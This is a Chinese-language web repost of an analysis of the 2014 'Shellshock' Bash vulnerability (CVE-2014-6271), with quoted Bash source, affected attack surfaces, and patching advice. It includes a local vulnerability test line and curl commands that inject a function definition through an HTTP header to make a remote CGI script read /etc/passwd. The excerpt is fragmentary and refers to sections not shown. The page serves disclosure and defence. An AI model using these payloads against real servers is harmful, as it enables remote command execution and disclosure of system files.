“破壳”漏洞系列分析之一
时间:2014-10-23 09:10:01
小编:动力软件园
阅读:
注1:Bash引自维基百科的描述为:"Bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上,包括Linux与Mac OS X v10.4都将它作为默认shell。它也被移植到Microsoft Windows上的Cygwin与MinGW,或是可以在MS-DOS上使用的DJGPP项目。在Novell NetWare与Android上也有移植。"
注2:A级响应是安天对威胁认定的最高等级,安天针对可能引发大规模网络瘫痪阻塞的蠕虫疫情和严重漏洞,以及可能大面积危害关键信息系统和基础设施安全的严重威胁将启动A级响应。具体响应要求为,无条件中止分析团队现有工作,立即成立分析小组,启动快速分析工作,及时通报相关CERT组织和管理部门;对威胁进行持续跟踪,对分析和响应相关文献,持续更新同步等。这是安天今年第二次启动A级响应,此前一次为心脏出血漏洞,自安天建立威胁响应分级机制以来,曾为口令蠕虫、震荡波、冲击波、SQL Slammer、魔波、熊猫烧香等事件启动A级响应。
#define SEVAL_FUNCDEF 0x080 /* onlyallow function definitions */
#define SEVAL_ONECMD 0x100 /* onlyallow a single command
*//builtins/evalstring.c
if((flags & SEVAL_FUNCDEF) && command->type != cm_function_def)
{
internal_warning("%s: ignoring function definition attempt", from_file);
should_jump_to_top_level= 0;
last_result= last_command_exit_value = EX_BADUSAGE;
break;
}
if (flags & SEVAL_ONECMD)
break;
env x=() { :;}; echo Vulnerable CVE-2014-6271 bash-c "echo test"
#!/bin/bash
echo"Content-type: text/html"
echo ""
curl -H x: () { :;};a=`/bin/cat /etc/passwd`;echo $a\http://IP地址/cgi-bin/test.sh -I
curl -H x: () { :;};a=`/bin/cat /etc/passwd`;echo $a\替换URL -I
1.此漏洞可以绕过ForceCommand在sshd中的配置,从而执行任意命令;
2.如果CGI脚本用Bash编写,则使用mod_cgi或mod_cgid的Apache服务器会受到影响;
3.DHCP客户端调用shell脚本来配置系统,可能存在允许任意命令执行;
4.各种daemon和SUID/privileged的程序都可能执行shell脚本,通过用户设置或影响环境变量值,允许任意命令运行。
1.按第六节中的漏洞验证方法进行验证判定,如确定存在漏洞,则针对第三节给出的解决方案进行版本更新。
2.更新Bash源码,针对ENV命令实现部分,进行边界检查与参数过滤,严格界定函数定义范围,并做合法化的参数判断。
相关阅读
-
iPhone存在邮件漏洞是怎么回事动力软件园提供iPhone存在邮件漏洞是怎么回事的全部内容,今日在网上爆出iPhone存在邮件漏洞,并且该漏洞很可能被攻击,面对此次漏洞,苹果方已经做出了回应,iPhone存在邮件漏洞是怎么回事呢,想知道的小伙伴快来动力软件园手机专区一起看看吧。时间:2020-04-23
-
水滴筹回应漏洞多是怎么回事 水滴筹回应漏洞多说了什么水滴筹回应漏洞多是怎么回事?水滴筹这个东西大家应该都知道,目前只要有人出现了什么病变,就可以通过它来向大众发起筹款,极为有效的帮助了一些因资金所迫的社会人群,不过在近日却有人开始爆料水滴筹存在的一些隐患,下面就和小编一起看看吧。时间:2019-12-02
-
渗透测试实践指南必知必会的工具与方法(第八章、渗透测试总结)1.编写渗透测试报告 ①综合报告 ②对渗透测试执行情况的概述(帮助客户理解控制或者入侵系统的成功程度) ③详细报告 ④原始输出(假如需要的话)时间:2016-08-03
-
渗透测试实践指南必知必会的工具与方法(第七章、第七章、维持访问)1.使用Back door(后门)及Rootkit维持访问①Back door:运行在目标计算机上的隐藏进程,使得攻击者随时返回(或连接)到目标计算机上②Rootkit:一类特殊的软件,深嵌在操作系时间:2016-08-03
-
渗透测试实践指南必知必会的工具与方法(第六章、基于Web的漏洞利用)1.常见Web应用入侵框架: ①w3af(Web应用程序审计和攻击框架); ②Burp Suite; ③ZAP(OWASP的Zed攻击代理); ④Websecurify; ⑤Paros时间:2016-08-03
-
渗透测试实践指南必知必会的工具与方法(第五章、社会工程)1.社会工程工具包(Social-Engineer Toolkit)(SET)2.在Kali的文件夹结构中,/usr/bin/<工具名>中放置了二进制文件,真正的应用程序文件在/usr/share/<工具名>中3.SET安装在时间:2016-08-03
-
渗透测试实践指南必知必会的工具与方法(第四章、漏洞利用)1.在线密码破解器(指与SSH或者Telnet 等“活跃服务”交互的一种攻击技术) ①Medusa 命令格式: medusa -h target_ip -u username -Ppassword_dictiona时间:2016-08-03
-
渗透测试实践指南必知必会的工具与方法(第三章、扫描)(建立IP地址与开放端口和服务的映射关系)1.扫描过程的通常步骤①用Ping数据包验证系统是否正在运行判断目标系统是否已经开启以及是否可以与我们的计算机进行通信(这一步时间:2016-08-03
-
渗透测试实践指南必知必会的工具与方法(第一章、什么是渗透测试)1.白盒渗透测试:不尝试隐身攻击,考虑全面性。2.黑盒渗透测试:模拟攻击者进行攻击。3.APT(AdvancedPackage Tool, 高级打包工具)① apt-get install② apt-update③ apt-c时间:2016-08-03
-
FortiGate设备认证绕过漏洞近日,FortiGate设备被披露存在认证绕过漏洞,攻击者可通过该漏洞直接获取目标设备控制权限,操控设备启停、流量窃听、甚至开启VPN进行内网渗透等,危害巨大。时间:2016-01-20
-
如何检测网站是否存在XSS跨站漏洞方法一: 查看代码,查找关键的变量, 客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单,以及cookie. 例如在ASP的程序中,通过Request对象获取客户时间:2014-05-09
-
Jsky网站漏洞扫描工具使用教程(图文)工具描述 Jsky是一款国内知名的网站漏洞扫描工具,不仅能够深入的发现Web应用中存在的安全弱点,同时支持渗透测试功能,即能模拟黑客攻击来评估网站的安全。Jsky基于XML框时间:2014-05-08
-
OpenSSL HeartBleed安全漏洞排查手册针对近期互联网披露的OpenSSL“HeartBleed”漏洞,需要对互联网的设备和系统进行了风险排查,发现大量系统、网络设备和安全厂商设备存在该漏洞。为进一步排查现网时间:2014-04-22
热门阅读
-
Nessus工具使用技巧及图解教程(图文)
阅读:4410
-
WebScarab使用教程(图文)
阅读:2204
-
工行个人网上银行无法显示此页解决办法(一招搞定)
阅读:835
-
Httprint工具使用方法 自动化的http指纹分析工具
阅读:1974
-
DirBuster使用教程帮助 DirBuster图形界面的操作
阅读:1598